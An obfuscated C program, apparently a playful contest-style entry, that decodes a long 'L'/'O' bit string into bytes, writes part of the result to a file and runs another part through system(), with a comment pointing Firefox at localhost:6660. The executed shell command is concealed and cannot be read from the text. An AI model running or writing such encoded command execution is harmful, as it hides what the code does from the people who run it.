// gcc CANCER.c && ./a.out & firefox http://localhost:6660/

#include \
<stdio.h>
#include \
<stdlib.h>
#define P\
(X) ((X-(\
(~0)&0xF)\
+(0x61)+0\
+0x0000F))
char * d =

"LOOOLLOLLOOLLOLOLOOOLLLOLOOOLOLOLOOLOLLOLOOOLLOLLOOLLOLOLLOLOLLLLLOLLOOOLOOLO"
"LLLLOOOLOLLLOOOLOLLLOOOLLLLLLOLLOOOLLOLOLLOLLOLOOOLLOOLLLOOLOOOLLOLLOOLLOLOLO"
"OLLLLOLOOOLOLLLOOLLOLOLOLOLLOOLOOLLOLOLOOOLLOLLOOOLOOLLOOLLOLOLOOOLLOLLLOLOLL"
"LLOOLLOOLLOOOLOLOLOOLOOOLLOOLLLOOLOOOLOLLLOOLOLLOLOOLOOOOLOOLOOOLLLOLOLLLLOOL"
"LLLOLLOLOOLLLOOLLLOLLLOLOLLOLOOOOLOOLOOLLLOLLLOLOOOLLOOLLOLOLOOLOOOLLOOLLOLLL"
"LOLOLLLLLOLLOOOLOLLOLLLLOLLLOLOLOLLOOLLLOLLOOLLLOLLOOOOLLOLLLLLLOLLLOOLLOLOLL"
"OLLOLLOOOOLOLLOOLOLLOLLLLLLOLLLLOOLOLLLLLOLOLLOOOLLOLLLLOOLOLLLOLOLOLOLLOLLLO"
"LLOOOLLOLOLLOLOOOOOLOLLOLOLLOLLOLOOOLLOOLOOLLLOOLOLLOLOOOLLOOLOOOLOLLLOOLLOLO"
"LOOLOOOLLLOLOLLLLLOOLOOLLLOOLOOLLLOOLOOLLLOOLLLLLLOLOLLOLLOLOOOOLLOLOOOOLOOLO"
"OOLLOOLOOOOLOOLLOLLLOOLLOLOLLOLLLLLLOLLLLOOLOLLLLLOLOLLOOOLLOLLLLOOLOLLLOLOLO"

"LOL"

"LOL"

;char o[P(1)],i=P(0),v,j;main()
{{{while(i--+(v=P(-97)+(j=P(-89
))-8)){;while(j){v|=(d[i*P(-89)
-(--j)+P(-90)]==0x4F)<<j;}{o[i]
=v;}}o[P(0)]=P(-97);FILE*f=fop\
en(o+P(-6),"w");{fputs(o,f);}f\
close(f);{system(o+P(-11));}}}}

